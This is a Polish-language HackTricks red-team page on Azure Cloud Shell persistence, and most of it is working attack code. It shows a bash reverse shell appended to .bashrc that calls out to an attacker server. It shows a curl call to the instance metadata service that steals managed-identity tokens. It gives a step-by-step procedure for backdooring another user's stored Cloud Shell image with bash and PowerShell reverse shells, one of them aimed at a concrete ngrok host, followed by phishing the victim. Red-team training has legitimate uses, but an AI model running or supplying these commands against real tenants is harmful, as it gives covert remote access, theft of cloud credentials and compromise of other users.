Az - Cloud Shell Persistence

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks

Cloud Shell Persistence

Azure Cloud Shell oferuje dostęp do wiersza poleceń w celu zarządzania zasobami Azure z persistent storage i automatyczną autoryzacją. Atakujący mogą to wykorzystać, umieszczając backdoory w persistent home directory:

  • Persistent Storage: Katalog domowy Azure Cloud Shell jest zamontowany na udostępnionym pliku Azure i pozostaje nienaruszony nawet po zakończeniu sesji.
  • Startup Scripts: Pliki takie jak .bashrc lub config/PowerShell/Microsoft.PowerShell_profile.ps1 są automatycznie wykonywane na początku każdej sesji, co pozwala na persistent execution, gdy cloud shell się uruchamia.

Example backdoor in .bashrc:

echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc

Ten backdoor może wykonywać polecenia nawet 5 minut po zakończeniu sesji chmury przez użytkownika.

Dodatkowo zapytaj o usługi metadanych Azure w celu uzyskania szczegółów instancji i tokenów:

curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s

Cloud Shell Phishing

Jeśli atakujący znajdzie obrazy innych użytkowników w koncie Storage, do którego ma dostęp do zapisu i odczytu, będzie mógł pobrać obraz, dodać do niego backdoora bash i PS oraz przesłać go z powrotem do konta Storage, aby następnym razem, gdy użytkownik uzyska dostęp do powłoki, polecenia były automatycznie wykonywane.

  • Pobierz, dodaj backdoora i przesłać obraz:
# Download image
mkdir /tmp/phishing_img
az storage file download-batch -d /tmp/phishing_img --account-name <acc-name> -s <file-share>

# Mount the image
mkdir /tmp/backdoor_img
sudo mount ./.cloudconsole/acc_carlos.img /tmp/backdoor_img
cd /tmp/backdoor_img

# Create backdoor
mkdir .config
mkdir .config/PowerShell
touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1

# Bash backdoor
echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc

# PS backdoor
echo '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19838);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' >> .config/PowerShell/Microsoft.PowerShell_profile.ps1

# Unmount
cd /tmp
sudo umount /tmp/backdoor_img

# Upload image
az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img" -s <file-share>
  • Następnie, phishinguj użytkownika, aby uzyskać dostęp do https://shell.azure.com/

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks